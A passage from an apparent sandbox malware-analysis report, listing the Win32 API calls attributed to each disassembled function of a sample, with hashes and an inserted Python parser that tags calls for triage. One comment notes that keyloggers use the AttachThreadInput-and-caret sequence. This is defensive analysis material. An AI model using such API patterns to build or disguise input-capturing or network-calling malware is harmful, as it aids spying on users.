Similarity
• API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
• String ID:
• API String ID: 2759813231-0
• Opcode ID: adbdb5d086e945f845dbeb730a795be3d5b513d0116299d0e2d628cd57f5fdc5
• Instruction ID: badce499d7b4f54bf88a2155d9e8084f4821aa17fd514a95812ac833b5c8c99a
• Opcode Fuzzy Hash: adbdb5d086e945f845dbeb730a795be3d5b513d0116299d0e2d628cd57f5fdc5
• Instruction Fuzzy Hash: 18311E71D00108AFDB01EFA5D845DEFBBF9EF58314B10846AE915E7211DA359E058BA0
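The per-function APIs listings in this section record the Win32 calls the sandbox attributed to each disassembled function, with calls reached through a callee prefixed "Part of subcall function <addr>:" and argument values it could not resolve shown as "?". Reading dozens of such entries by hand is slow, so the following Python is added here as an example (it is not part of the Joe Sandbox report or of the analysed sample) of how to parse those listings into ordered call sequences and apply a first pass of triage tags. The two listings embedded as input are copied from the entries above (the AttachThreadInput/GetCaretPos function and the WinINet function); the bullet-line grammar is inferred from how this page renders the report, and the tag rules are assumptions for illustration, not Joe Sandbox's own signature logic. In an interpreter-based or packed binary many such functions belong to the runtime rather than the payload, so a tag marks an entry for review, not a verdict.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Set

# Sample input: two "APIs" listings copied from the report above, each followed
# by the "Memory Dump Source" line that terminates it in the report layout.
SAMPLE = """\
APIs
• GetForegroundWindow.USER32 ref: 00417CB9
  • Part of subcall function 003F5F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 003F5F6F
  • Part of subcall function 003F5F55: GetCurrentThreadId.KERNEL32 ref: 003F5F76
  • Part of subcall function 003F5F55: AttachThreadInput.USER32(00000000,?,003F781F), ref: 003F5F7D
• GetCaretPos.USER32(?), ref: 00417CCA
• ClientToScreen.USER32(00000000,?), ref: 00417D03
• GetForegroundWindow.USER32 ref: 00417D09
Memory Dump Source
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00404358
  • Part of subcall function 004043E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00404401
  • Part of subcall function 004043E2: InternetCloseHandle.WININET(00000000), ref: 0040449E
Memory Dump Source
"""

# One bullet: optional "Part of subcall function <addr>:" prefix, API.MODULE,
# optional (args), then ", ref: <call site>". Unresolved argument values are "?".
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][\w:]*)\.(?P<mod>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: int                   # address of the call site
    subcall_of: Optional[int]  # callee address when listed as a subcall, else None


def parse_api_blocks(text: str) -> List[List[ApiCall]]:
    """One list of calls per "APIs" header, in listing order. A block runs up to
    the next "Memory Dump Source" line; an entry with no calls yields []."""
    blocks: List[List[ApiCall]] = []
    current: Optional[List[ApiCall]] = None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current = []
            blocks.append(current)
            continue
        if stripped == "Memory Dump Source":
            current = None
            continue
        if current is None or not (m := CALL_RE.match(line)):
            continue  # outside a block, or a bullet in another format
        raw_args = m.group("args")
        current.append(ApiCall(
            api=m.group("api"),
            module=m.group("mod").upper(),
            args=[a.strip() for a in raw_args.split(",")] if raw_args else [],
            ref=int(m.group("ref"), 16),
            subcall_of=int(m.group("sub"), 16) if m.group("sub") else None,
        ))
    return blocks


def tag_behaviours(calls: List[ApiCall]) -> Set[str]:
    """Illustrative triage tags; an assumption of this example, not Joe Sandbox's
    signature logic. A tag flags something to inspect, not a verdict."""
    names = {c.api for c in calls}
    tags: Set[str] = set()
    if any(c.module == "WININET" for c in calls):
        tags.add("network:wininet")
    # AttachThreadInput followed by a caret/focus query lets one thread read the
    # caret position of another thread's window. GUI automation does this
    # legitimately; keyloggers use the same sequence to find the focused control.
    if "AttachThreadInput" in names and names & {"GetCaretPos", "GetFocus", "GetForegroundWindow"}:
        tags.add("input:attach-thread-input")
    return tags


def summarize(text: str) -> List[Dict[str, object]]:
    """Per entry: ordered API sequence, modules touched, subcall roots, tags."""
    return [{
        "sequence": [c.api for c in calls],
        "modules": sorted({c.module for c in calls}),
        "subcall_roots": sorted({f"{c.subcall_of:08X}" for c in calls if c.subcall_of is not None}),
        "tags": sorted(tag_behaviours(calls)),
    } for calls in parse_api_blocks(text)]


if __name__ == "__main__":
    for i, entry in enumerate(summarize(SAMPLE)):
        print(i, entry["tags"], " -> ".join(entry["sequence"]))
```

Run over the text of the whole disassembly section it yields one summary per function entry. The `subcall_roots` field is the useful part when the section is long: entries that reach the same callee (here 003F5F55 for the thread-input helper and 004043E2 for the WinINet helper) share one underlying routine, so the behaviours the sandbox lists under many functions can be traced back to a handful of helpers before anything is read in IDA.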
APIs
  • Part of subcall function 003CB34E: GetWindowLongW.USER32(?,000000EB), ref: 003CB35F
• GetCursorPos.USER32(?), ref: 0041F211
• TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0042E4C0,?,?,?,?,?), ref: 0041F226
• GetCursorPos.USER32(?), ref: 0041F270
• DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0042E4C0,?,?,?), ref: 0041F2A6
Memory Dump Source
• Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
• Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
Similarity
• API ID: Cursor$LongMenuPopupProcTrackWindow
• String ID:
• API String ID: 2864067406-0
• Opcode ID: bac83fe7ef2d1c6d4ecb91df1d89dc4019b7be120c241a821cf7274680af8510
• Instruction ID: 79e461f8e86cc4d9ca2ce0cd1d8b1506771823178f81fc474d7c26d61d2805a8
• Opcode Fuzzy Hash: bac83fe7ef2d1c6d4ecb91df1d89dc4019b7be120c241a821cf7274680af8510
• Instruction Fuzzy Hash: 19219439501024BFCB168F94D859EEF7BB5FF0A710F0480AAF9098B2A1D3359D92DB54
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00404358
  • Part of subcall function 004043E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00404401
  • Part of subcall function 004043E2: InternetCloseHandle.WININET(00000000), ref: 0040449E
Memory Dump Source
• Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
• Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
Similarity
• API ID: Internet$CloseConnectHandleOpen
• String ID:
• API String ID: 1463438336-0
• Opcode ID: 41d909dd0507cd9e320b823ecf93e470213716a951db40041c5b0fd111039071
• Instruction ID: 76d9df581a3efe23f1339a3009f91fef3befd078d994a7b97412e5d4ee0524c4
• Opcode Fuzzy Hash: 41d909dd0507cd9e320b823ecf93e470213716a951db40041c5b0fd111039071
• Instruction Fuzzy Hash: D321C2B5700601BBEB119F609C01F7BB7A9FF84714F00603BBB15A6690D77598219B98
APIs
• select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00408AE0
• __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00408AF2
• accept.WSOCK32(00000000,00000000,00000000), ref: 00408AFF
• WSAGetLastError.WSOCK32(00000000), ref: 00408B16
Memory Dump Source
• Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
• Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
Similarity
• API ID: ErrorLastacceptselect
• String ID:
• API String ID: 385091864-0
• Opcode ID: 6d2ae69e402f83eff4025055fca22ee4335942604c1c9b0fa5e83add828899d1
• Instruction ID: a2412779d48b57047c4e37cf75a73e0f5248fcac914b7be7d07b7eb532a9e7d8
• Opcode Fuzzy Hash: 6d2ae69e402f83eff4025055fca22ee4335942604c1c9b0fa5e83add828899d1
• Instruction Fuzzy Hash: F9216671A001249FC7219F69D985A9EBBFCEF49350F00816AF849EB291DB749D418F94
APIs
• GetWindowLongW.USER32(?,000000EC), ref: 00418AA6
• SetWindowLongW.USER32(?,000000EC,00000000), ref: 00418AC0
• SetWindowLongW.USER32(?,000000EC,00000000), ref: 00418ACE
• SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00418ADC
Memory Dump Source
• Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
• Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
Similarity
• API ID: Window$Long$AttributesLayered
• String ID:
• API String ID: 2169480361-0
• Opcode ID: d7355dcf274690ec9e0dd8f6fa42c282e03c498c0cc37068b62ac77844516147
• Instruction ID: 8efab72d25bf1cc6a1394fc7545971afbd2f97fe0f3129bf2fa5afdd3d0c3c3c
• Opcode Fuzzy Hash: d7355dcf274690ec9e0dd8f6fa42c282e03c498c0cc37068b62ac77844516147
• Instruction Fuzzy Hash: A611BE31745114AFDB05AB28DC05FFA77ADAF95360F14411AF916CB2E1CB74BC418798
APIs
  • Part of subcall function 003F1E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,003F0ABB,?,?,?,003F187A,00000000,000000EF,00000119,?,?), ref: 003F1E77
  • Part of subcall function 003F1E68: lstrcpyW.KERNEL32(00000000,?,?,003F0ABB,?,?,?,003F187A,00000000,000000EF,00000119,?,?,00000000), ref: 003F1E9D
  • Part of subcall function 003F1E68: lstrcmpiW.KERNEL32(00000000,?,003F0ABB,?,?,?,003F187A,00000000,000000EF,00000119,?,?), ref: 003F1ECE
• lstrlenW.KERNEL32(?,00000002,?,?,?,?,003F187A,00000000,000000EF,00000119,?,?,00000000), ref: 003F0AD4
• lstrcpyW.KERNEL32(00000000,?,?,003F187A,00000000,000000EF,00000119,?,?,00000000), ref: 003F0AFA
• lstrcmpiW.KERNEL32(00000002,cdecl,?,003F187A,00000000,000000EF,00000119,?,?,00000000), ref: 003F0B2E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
• Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
Similarity
• API ID: lstrcmpilstrcpylstrlen
• String ID: cdecl
• API String ID: 4031866154-3896280584
• Opcode ID: c28dda562364e1c53b8e4fb63315dcc38b3ff7548bac11a8617f32c923529742
• Instruction ID: d37802fef593edf0468dfaf99740f89f09bebd7e66a8d20fd6c2e44be746a1e1
• Opcode Fuzzy Hash: c28dda562364e1c53b8e4fb63315dcc38b3ff7548bac11a8617f32c923529742
• Instruction Fuzzy Hash: CB11D336210309AFDB2AAF78DC05E7A77A9FF45314B80412AE906CB291EB71DC50C7A0
APIs
• _free.LIBCMT ref: 003E2FB5
  • Part of subcall function 003D395C: __FF_MSGBANNER.LIBCMT ref: 003D3973
  • Part of subcall function 003D395C: __NMSG_WRITE.LIBCMT ref: 003D397A
  • Part of subcall function 003D395C: RtlAllocateHeap.NTDLL(00F30000,00000000,00000001,00000001,00000000,?,?,003CF507,?,0000000E), ref: 003D399F
Memory Dump Source
• Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
• Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
Similarity
• API ID: AllocateHeap_free
• String ID:
• API String ID: 614378929-0
• Opcode ID: 30582793216c7c3ea1cf4a958f800f6793fb8d2637b0ca5244cd9fb91e15dcba
• Instruction ID: 88b5b53d5d5ab0c1401efcd9047a2475327dc1312f8c826d348c8f4b2b110725
• Opcode Fuzzy Hash: 30582793216c7c3ea1cf4a958f800f6793fb8d2637b0ca5244cd9fb91e15dcba
• Instruction Fuzzy Hash: 3B11AB73949261AFDB233B71BC0565A3BA8AF04360F214A26F9499F2D1DB30CD519A94
APIs
• _memset.LIBCMT ref: 003CEBB2
  • Part of subcall function 003B51AF: _memset.LIBCMT ref: 003B522F
  • Part of subcall function 003B51AF: _wcscpy.LIBCMT ref: 003B5283
  • Part of subcall function 003B51AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 003B5293
• KillTimer.USER32(?,00000001,?,?), ref: 003CEC07
• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 003CEC16
• Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00423C88
Memory Dump Source
• Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
• Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
Similarity
• API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
• String ID:
• API String ID: 1378193009-0
• Opcode ID: e80964d671024185716813675c7cb9a49ab61cdc03814aecfcbaf411e6564111
• Instruction ID: 9b0020833744cb598910a2d99974c342c6e82743d4e0336f466c9d4b9b76898f
• Opcode Fuzzy Hash: e80964d671024185716813675c7cb9a49ab61cdc03814aecfcbaf411e6564111
• Instruction Fuzzy Hash: 7D21D771A047949FE7379B28DC59FE7BBFC9B01308F04049EE69EA6241C3782A848B55
APIs
• GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 003F05AC
• LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 003F05C7
• RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 003F05DD
• FreeLibrary.KERNEL32(?), ref: 003F0632
Memory Dump Source
• Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
• Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
Similarity
• API ID: Type$FileFreeLibraryLoadModuleNameRegister
• String ID:
• API String ID: 3137044355-0
• Opcode ID: 64f7ba60465d32fd7799ab87f7c603df28d02d77bd4083fca1c69294fc4612f6
• Instruction ID: f780f80a5771ac8eba73c5fd6e3ea9ead15e4b471a72790516adac6f320310da
• Opcode Fuzzy Hash: 64f7ba60465d32fd7799ab87f7c603df28d02d77bd4083fca1c69294fc4612f6
• Instruction Fuzzy Hash: D621BE7190020CEFDB268F98EC88EEABBBCEF40300F108469E616D6012D7B0EA54DF50
APIs
• CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 003F6733
• _memset.LIBCMT ref: 003F6754
• DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 003F67A6
• CloseHandle.KERNEL32(00000000), ref: 003F67AF
Memory Dump Source
• Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
• Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
Similarity
• API ID: CloseControlCreateDeviceFileHandle_memset
• String ID:
• API String ID: 1157408455-0
• Opcode ID: 6b01ff7a7d64c247e7d49ddcec0c8fbf19f7b8b8835bf15d96d426445c68b3d7
• Instruction ID: e3016330e97977697f72a837129319b7cd01f8ae3ba29b515c085c64c7ad7169
• Opcode Fuzzy Hash: 6b01ff7a7d64c247e7d49ddcec0c8fbf19f7b8b8835bf15d96d426445c68b3d7
• Instruction Fuzzy Hash: 33110A72D01228BAE72067A5AC4DFAFBABCEF44724F1041AAF504E71C0D2704E848B68
APIs
  • Part of subcall function 003EAA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 003EAA79
  • Part of subcall function 003EAA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 003EAA83
  • Part of subcall function 003EAA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 003EAA92
  • Part of subcall function 003EAA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 003EAA99
  • Part of subcall function 003EAA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 003EAAAF
• GetLengthSid.ADVAPI32(?,00000000,003EADE4,?,?), ref: 003EB21B
• GetProcessHeap.KERNEL32(00000008,00000000), ref: 003EB227
• HeapAlloc.KERNEL32(00000000), ref: 003EB22E
• CopySid.ADVAPI32(?,00000000,?), ref: 003EB247
Memory Dump Source
• Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
• Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
Similarity
• API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
• String ID:
• API String ID: 4217664535-0
• Opcode ID: 8bf7f705b68a1baa3f167abc42848de5fafc744367e7f9c784c1a04b1a077288
• Instruction ID: e665b739910d6d90d212f4f2ec00de827b718c408a70749bc13571f99a53ad35
• Opcode Fuzzy Hash: 8bf7f705b68a1baa3f167abc42848de5fafc744367e7f9c784c1a04b1a077288
• Instruction Fuzzy Hash: 7F110171A00215EFDF069FA5DD80AAFB7B9EF85308F14852DEA4297250D331AE40CB10
APIs
• SendMessageW.USER32(?,000000B0,?,?), ref: 003EB498
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 003EB4AA
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 003EB4C0
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 003EB4DB
Memory Dump Source
• Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
• Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 32f1f6a0e97d6f13d24043c4869eb263f3cc84e6927a3b3f26d079828af415fe
• Instruction ID: 26121b52c8b6da23f7c7a8f95354bd9ae9ed3cf8086e6c7badcc89cc4eb6f72a
• Opcode Fuzzy Hash: 32f1f6a0e97d6f13d24043c4869eb263f3cc84e6927a3b3f26d079828af415fe
• Instruction Fuzzy Hash: D4111C7A900218FFDB12DF9AC985E9EBBB4FB08710F204191E604B7295D771AE11DB94
APIs
  • Part of subcall function 003CB34E: GetWindowLongW.USER32(?,000000EB), ref: 003CB35F
• DefDlgProcW.USER32(?,00000020,?,00000000), ref: 003CB5A5
• GetClientRect.USER32(?,?), ref: 0042E69A
• GetCursorPos.USER32(?), ref: 0042E6A4
• ScreenToClient.USER32(?,?), ref: 0042E6AF
Memory Dump Source
• Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
• Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
Similarity
• API ID: Client$CursorLongProcRectScreenWindow
• String ID:
• API String ID: 4127811313-0
• Opcode ID: 07cdc6d52fe463fd72ca06a47ff1789272bbc179074746f9c84bfa099295541c
• Instruction ID: 8a5e5b3d9d02244d3ebbf23696106dc081d443615c843deed08778e5380ec6fd
• Opcode Fuzzy Hash: 07cdc6d52fe463fd72ca06a47ff1789272bbc179074746f9c84bfa099295541c
• Instruction Fuzzy Hash: AC113A31900029BBCB11DF98DC46DEEB7B9EB09305F400456F911E7140D334AA86CBA9
APIs
• GetCurrentThreadId.KERNEL32 ref: 003F7352
• MessageBoxW.USER32(?,?,?,?), ref: 003F7385
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 003F739B
• CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 003F73A2
Memory Dump Source
• Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
• Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
Similarity
• API ID: CloseCurrentHandleMessageObjectSingleThreadWait
• String ID:
• API String ID: 2880819207-0
• Opcode ID: adcf31f6a6391421e9e7184e9c91985900aa026380d0793abd8d0214d7cbd41c
• Instruction ID: f351fd32ab2f5d122420effb772881fa6b9a8edfd51bdea382c0a96c1d06aec9
• Opcode Fuzzy Hash: adcf31f6a6391421e9e7184e9c91985900aa026380d0793abd8d0214d7cbd41c
• Instruction Fuzzy Hash: 71110476A04209BFC7029FACEC09AEE7BAD9B44311F144366F925D32A2D6708D009BA4
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 003CD1BA
• GetStockObject.GDI32(00000011), ref: 003CD1CE
• SendMessageW.USER32(00000000,00000030,00000000), ref: 003CD1D8
Memory Dump Source
• Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
• Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
Similarity
• API ID: CreateMessageObjectSendStockWindow
• String ID:
• API String ID: 3970641297-0
• Opcode ID: cb25860ec1bd60acda1acc18ef286e643197610d26c42ae204564da5e636fc6b
• Instruction ID: 3edce8f8ee2ecc351ccebcf1627e431960eaa1d4f4f5fa596bed66cbb7d3e25b
• Opcode Fuzzy Hash: cb25860ec1bd60acda1acc18ef286e643197610d26c42ae204564da5e636fc6b
• Instruction Fuzzy Hash: 4211A972501509BFEF024FA0AC95FEABB6DFF09364F09012AFA1592160C731DC60EBA0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
• Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
Similarity
• API ID: __cftoe_l__cftof_l__cftog_l__fltout2
• String ID:
• API String ID: 3016257755-0
• Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
• Instruction ID: d0f13c4e59efd531a927add27bceb68cdfd4d69cc2c79955978a7520d519bb4b
• Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
• Instruction Fuzzy Hash: 12014C3600019EBBCF135E86DC068EE3F27BB5C354B598655FE28590B1D336DAB1AB81
APIs
  • Part of subcall function 003D7A0D: __getptd_noexit.LIBCMT ref: 003D7A0E
• __lock.LIBCMT ref: 003D748F
